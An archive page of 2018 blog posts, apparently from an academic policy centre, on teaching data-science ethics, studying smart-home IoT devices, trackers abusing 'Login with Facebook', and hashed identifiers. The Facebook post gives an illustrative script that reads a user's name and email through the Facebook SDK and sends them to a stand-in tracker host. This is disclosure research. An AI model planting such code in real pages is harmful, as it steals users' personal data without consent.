
Archives for April 2018

Ethics Education in Data Science: Classroom Topics and Assignments

[This blog post is a continuation of a recap of a recent workshop on data science ethics education.]

The creation of ethics modules that can be inserted into a variety of classes may help ensure that ethics as a subject is not marginalized and enable professors with little experience in philosophy or with fewer resources to incorporate ethics into their more technical classes. This post will outline some of the topics that professors have decided to cover in this field, as well as suggestions for types of assignments that may be useful. We hope that readers will consider ways to add these into their classes, and we welcome comments with further suggestions of topics or assignments.

With regard to ethics, some of the key topics that professors have covered include: deontology, consequentialism, utilitarianism, virtue ethics, moral responsibility, cultural relativism, social contract, feminist ethics, justice, the distinction between ethics and law, and the relationship between principles, standards, and rules.

Using these frameworks, professors can discuss a variety of topics, including: privacy, algorithmic bias, misinformation, intellectual property, surveillance, inequality, data collection, AI governance, free speech, transparency, security, anonymity, systemic risk, labor, net neutrality, accessibility, value-sensitive design, codes of ethics, predictive policing, virtual reality, ethics in industry, machine learning, clinical versus actuarial reasoning, issue spotting, and basic social science concepts.

In determining the most effective types of assignments, a common thread was the use of real-world data sets or examples to engage students. Some effective assignment formats include:

Debates: Students split up into groups, each representing a different interest group or stakeholder, and then argue for that entity’s stance. This could entail asking students to justify the way that groups or people actually acted in the past, or it may have students act as decision makers and decide how they would act or react in a given situation.

Critique Existing Policies: Ask students to choose a particular company’s data policy, a data collection method at their university, a recent FCC policy, or an organization’s code of ethics and critique it. This gives students experience in understanding the specific, concrete details of a policy and how it affects real people. By the end of the assignment, students may even be able to suggest changes to a company or university policy, providing impact beyond the classroom. This assignment can be framed to focus on either policy or ethics, depending on the goal of the project.

Adversarial Mindset: Assignments can provide insight by placing students into the mind of the adversary, such as having them design a fake news campaign or attempt to dox their professor. Understanding how malicious users think can enhance students’ ability to counter such attacks or even to counter the mindset itself. However, such assignments should be framed very carefully – students may enjoy the thrill of such assignments and find them intellectually exciting, ignoring the elements that are ethically problematic.

Peer Audit: Asking students to review the ethics of a given project can be a useful exercise, and it may be even more engaging for students if they are able to review the work of their peers. Peer audits can pair nicely with more technical assignments from the same class – for example, if students are asked to capture and inspect network traffic in one assignment, the next assignment may entail reviewing other students’ methods for doing so and flagging any that are ethically questionable. Graduate students can also be asked to audit their peers’ research.

Some recent case studies that may be interesting for students include: Cambridge Analytica’s use of Facebook data, the fatal crash of a self-driving Uber car, Facebook’s emotional contagion study, Encore censorship research, Chinese criminal facial tracking, Uber’s tracking of one night stands, Stanford’s “Gaydar” research, Black Mirror episodes, Latanya Sweeney’s anonymization work, NYPD Stop and Frisk Data, Predictive Policing, and COMPAS’s recidivism risk assessment tool.

A critical aspect of data science ethics education is ensuring that this field is well-respected so that students, universities, research communities, and industry respect and engage in efforts on this front. This may require a research-focused element, but efforts should also be dedicated to ensuring that students understand concretely how this applies to their lives and the lives of others. The field must encourage people to think beyond IRB and legal compliance, and to consider the impact of research or products even when they do not fall under the conventional conception of “human-subject research.” It will also be critical to engage industry in this field – largely because private companies impact our lives on a daily basis, but also because industry devotion to ethics can serve as an indicator to students that considering ethics is a worthwhile endeavor.

Although some have considered writing a textbook on this subject, technical capabilities and real-world examples change so rapidly that a textbook may be obsolete before it is even published. We encourage people to use other methods to share ideas on data science ethics education, such as blog posts, papers, or shared repositories with assignments and teaching tools that have been successful.

Announcing IoT Inspector: Studying Smart Home IoT Device Behavior

By Noah Apthorpe, Danny Y. Huang, Gunes Acar, Frank Li, Arvind Narayanan, Nick Feamster

An increasing number of home devices, from thermostats to light bulbs to garage door openers, are now Internet-connected. This “Internet of Things” (IoT) promises reduced energy consumption, more effective health management, and living spaces that react adaptively to users’ lifestyles. Unfortunately, recent IoT device hacks and personal data breaches have made security and privacy a focal point for IoT consumers, developers, and regulators.

Many IoT vulnerabilities sound like the plot of a science fiction dystopia. Internet-connected dolls allow strangers to spy on children remotely. Botnets of millions of security cameras and DVRs take down a global DNS service provider. Surgically implanted pacemakers are susceptible to remote takeover.

These security vulnerabilities, combined with the rapid evolution of IoT products, can leave consumers at risk, and in the dark about the risks they face when using these devices. For example, consumers may be unsure which companies receive personal information from IoT appliances, whether an IoT device has been hacked, or whether devices with always-on microphones listen to private conversations.

To shed light on the behavior of smart home IoT devices that consumers buy and install in their homes, we are announcing the IoT Inspector project.

Announcing IoT Inspector: Studying IoT Security and Privacy in Smart Homes

Today, at the Center for Information Technology Policy at Princeton, we are launching an ongoing initiative to study consumer IoT security and privacy, in an effort to understand the current state of the smart home in ways that ultimately help inform both technology and policy.

We have begun this effort by analyzing more than 50 home IoT devices ourselves. We are working on methods to help scale this analysis to more devices. If you have a particular device or type of device that you are concerned about, let us know. To learn more, visit the IoT Inspector website.

Our initial analyses have revealed several findings about home IoT security and privacy.


No boundaries for Facebook data: third-party trackers abuse Facebook Login

by Steven Englehardt [0], Gunes Acar, and Arvind Narayanan

So far in the No boundaries series, we’ve uncovered how web trackers exfiltrate identifying information from web pages, browser password managers, and form inputs.

Today we report yet another type of surreptitious data collection by third-party scripts that we discovered: the exfiltration of personal identifiers from websites through “login with Facebook” and other such social login APIs. Specifically, we found two types of vulnerabilities [1]:

  • seven third parties abuse websites’ access to Facebook user data
  • one third party uses its own Facebook “application” to track users around the web.

 

Vulnerability 1: Third parties piggyback on Facebook access granted to websites

[Figure: diagram of a third-party script accessing the Facebook API via the first party’s access]

When a user clicks “Login with Facebook”, they will be prompted to allow the website they’re visiting to access some of their Facebook profile information [2]. Even after Facebook’s recent moves to lock down the feature, websites can request the user’s email address and “public profile” (name, age range, gender, locale, and profile photo) without triggering a manual review by Facebook. Once the user grants access, any third-party JavaScript embedded in the page, such as tracker.com in the figure above, can also retrieve the user’s Facebook information as if it were the first party [3].
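To make the mechanism concrete, here is a minimal sketch of what such a script could do. This is a hypothetical illustration, not code from any script we observed: the tracker.example endpoint and the exact fields requested are assumptions. The snippet simply relies on the fact that the Facebook JS SDK, once loaded by the first party and authorized by the user, answers API calls from any script running on the page.

```typescript
// Hypothetical sketch of a third-party script piggybacking on the first party's Facebook access.
declare const FB: any; // global object exposed by the Facebook JS SDK that the website loaded

function exfiltrateProfile(): void {
  FB.getLoginStatus((statusResponse: any) => {
    if (statusResponse.status !== "connected") {
      return; // the user has not granted this website access to their Facebook profile
    }
    // The SDK does not distinguish first-party from third-party callers on the page.
    FB.api("/me", { fields: "name,email" }, (profile: any) => {
      // Ship the identifiers off to the tracker's own server (illustrative endpoint).
      navigator.sendBeacon("https://tracker.example/collect", JSON.stringify(profile));
    });
  });
}

exfiltrateProfile();
```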


Ethics Education in Data Science

Data scientists in academia and industry are increasingly recognizing the importance of integrating ethics into data science curricula. Recently, a group of faculty and students gathered at New York University before the annual FAT* conference to discuss the promises and challenges of teaching data science ethics, and to learn from one another’s experiences in the classroom. This blog post is the first of two that will summarize the discussions at this workshop.

There is general agreement that data science ethics should be taught, but less consensus about what its goals should be or how they should be pursued. Because the field is so nascent, there is substantial room for innovative thinking about what data science ethics ought to mean. In some respects, its goal may be the creation of “future citizens” of data science who are invested in the welfare of their communities and the world, and understand the social and political role of data science therein. But there are other models, too: for example, an alternative goal is to equip aspiring data scientists with technical tools and organizational processes for doing data science work that aligns with social values (like privacy and fairness). The group worked to identify some of the biggest challenges in this field, and when possible, some ways to address these tensions.

One approach to data science ethics education is to include a standalone ethics course in the program’s curriculum. Another is to embed discussions of ethics into existing courses in a more integrated way. There are advantages and disadvantages to both options. Standalone ethics courses may attract a wider variety of students from different disciplines than technical classes alone, which provides potential for rich discussions. They allow professors to cover basic normative theories before diving into specific examples, without having to skip those theories or assume that students covered them in other courses. Independent ethics courses also do not necessarily require cooperation from multiple professors or departments, making them easier to organize. However, many worry that teaching ethics separately from technical topics may marginalize it and lead students to perceive it as unimportant. Further, standalone courses can be either elective or mandatory. If elective, they may attract a self-selecting group of students, potentially leaving out others who could benefit from exposure to the material; if mandatory, they may be seen as displacing technical training that students want and need. Embedding ethics within existing CS courses may avoid some of these problems and can also elevate the discourse around ethical dilemmas by ensuring that students are well-versed in the specific technical aspects of the problems they discuss.

Beyond course structure, ethics courses can be challenging for data science faculty to teach effectively. Many students used to more technical course material are challenged by the types of learning and engagement required in ethics courses, which are often reading-heavy. And the “answers” in ethics courses are almost never clear-cut. The lack of clear answers or easily constructed rubrics can complicate grading, since both students and faculty in computer science may be used to grading based on more objective criteria. However, this problem is certainly not insurmountable – humanities departments have dealt with this for centuries, and dialogue with them may illuminate some solutions to this problem. Asking students to complete frequent but short assignments rather than occasional long ones may make grading easier, and also encourages students to think about ethical issues on a more regular basis.

Institutional hurdles can hinder a university’s ability to satisfactorily address questions of ethics in data science. A dearth of faculty may make it difficult to offer a standalone course on ethics, and a smaller faculty may push a university towards incorporating ethics into existing CS courses rather than creating a new class. Even this, however, requires that professors have the time and knowledge to do so, which is not always the case.

The next blog post will enumerate topics discussed and assignments used in courses that discuss ethics in data science.

Thanks to Karen Levy and Kathy Pham for their edits on a draft of this post.

When the business model *is* the privacy violation

Sometimes, when we worry about data privacy, we’re worried that data might fall into the wrong hands or be misused for unintended purposes. If I’m considering participating in a medical study, I’d want to know if insurance companies will obtain the data and use it against me. In these scenarios, we should look for ways to preserve the intended benefit while preventing unintended uses. In other words, achieving utility and privacy is not a zero-sum game. [1]

In other situations, the intended use is the privacy violation. The most prominent example is the tracking of our online and offline habits for targeted advertising. This business model is exactly what people object to, for a litany of reasons: targeting is creepy, manipulative, discriminatory, and reinforces harmful stereotypes. The data collection that enables targeted advertising involves an opaque surveillance infrastructure to which it’s impossible to give meaningfully informed consent, and the resulting databases give a few companies too much power over individuals and over democracy. [2]

In response to privacy laws, companies have tried to find technical measures that obfuscate the data but allow them to carry on with the surveillance business as usual. But that’s just privacy theater. Technical steps that don’t affect the business model are of limited effectiveness, because the business model is fundamentally at odds with privacy; this is in fact a zero-sum game. [3]

For example, there’s an industry move to replace email addresses and other personal identifiers with hashed versions. But a hashed identifier is nevertheless a persistent, unique identifier that allows linking a person across databases, devices, and contexts, as well as targeting and manipulation on the basis of the associated data. Thus, hashing completely fails to address the underlying privacy concerns.
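To see why hashing is not anonymization here, consider a minimal sketch (assuming Node.js and SHA-256, purely for illustration; the email address is made up). Because the hash is deterministic, every company that hashes the same address independently ends up with the same value, which then serves as a shared join key across their databases:

```typescript
import { createHash } from "node:crypto";

// Hashing an email address yields a deterministic digest: anyone who applies the
// same hash to the same address gets the same value, so the "anonymized"
// identifier still links a person across databases, devices, and contexts.
function hashEmail(email: string): string {
  return createHash("sha256").update(email.trim().toLowerCase()).digest("hex");
}

// Hypothetical address, for illustration only.
const adNetworkId = hashEmail("alice@example.com");   // computed by an ad network
const dataBrokerId = hashEmail("alice@example.com");  // computed independently by a data broker

console.log(adNetworkId === dataBrokerId); // true: the two records can be joined
```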

Policy makers and privacy advocates must recognize when privacy is a zero-sum game and when it isn’t. Policy makers like non-zero sum games because they can simultaneously satisfy different stakeholders. But they must acknowledge that sometimes this isn’t possible. In such cases, laws and regulations should avoid loopholes that companies might exploit by building narrow technical measures and claiming to be in compliance. [4]

Privacy advocates should recognize that framing a concern about data use practices as a privacy problem is a double-edged sword. Privacy can be a convenient label for a set of related concerns, but it gives industry a way to deflect attention from deeper ethical questions by interpreting privacy narrowly as confidentiality.

Thanks to Ed Felten and Nick Feamster for feedback on a draft.


[1] There is a vast computer science privacy literature predicated on the idea that we can have our cake and eat it too. For example, differential privacy seeks to enable analysis of data in the aggregate without revealing individual information. While there are disagreements on the specifics, such as whether de-identification results in a win-win outcome, there is no question that the overall direction of privacy-preserving data analysis is an important one.
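As a toy illustration of that direction, here is a minimal sketch of the Laplace mechanism, a basic building block of differential privacy. The data, epsilon value, and query below are illustrative assumptions; the point is that an analyst learns an approximate aggregate while no single record is released exactly:

```typescript
// Toy sketch of the Laplace mechanism (illustrative parameters, not production code).

// Draw one sample from a Laplace(0, scale) distribution via inverse-CDF sampling.
function laplaceNoise(scale: number): number {
  const u = Math.random() - 0.5;
  return -scale * Math.sign(u) * Math.log(1 - 2 * Math.abs(u));
}

// Answer a counting query with epsilon-differential privacy.
// A count has sensitivity 1: adding or removing one person changes it by at most 1.
function privateCount(records: boolean[], epsilon: number): number {
  const trueCount = records.filter(Boolean).length;
  return trueCount + laplaceNoise(1 / epsilon);
}

// Example: how many study participants have a given condition?
const hasCondition = [true, false, true, true, false];
console.log(privateCount(hasCondition, 0.5)); // noisy aggregate; no individual record is revealed
```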

[2] In Mark Zuckerberg’s congressional testimony, he framed Facebook’s privacy woes as being about improper third-party access to the data. This is arguably a non-zero sum game, and one that Facebook is equipped to address without the need for legislation. However, the much bigger privacy problem is Facebook’s own data collection and business model, which is inherently at odds with privacy and is unlikely to be solved without legislation.

[3] There are research proposals for targeted advertising, such as Adnostic, that would improve privacy by drastically changing the business model, largely cutting out the tracking companies. Unsurprisingly, there has been no interest in these approaches from the traditional ad tech industry, but some browser vendors have experimented with similar ideas.

[4] As an example of avoiding the hashing loophole, the 2012 FTC privacy report is well written: it says that for data to be considered de-identified, “the company must achieve a reasonable level of justified confidence that the data cannot reasonably be used to infer information about, or otherwise be linked to, a particular consumer, computer, or other device.” It goes on to say that “reasonably” includes reasonable assumptions about the use of external data sources that might be available.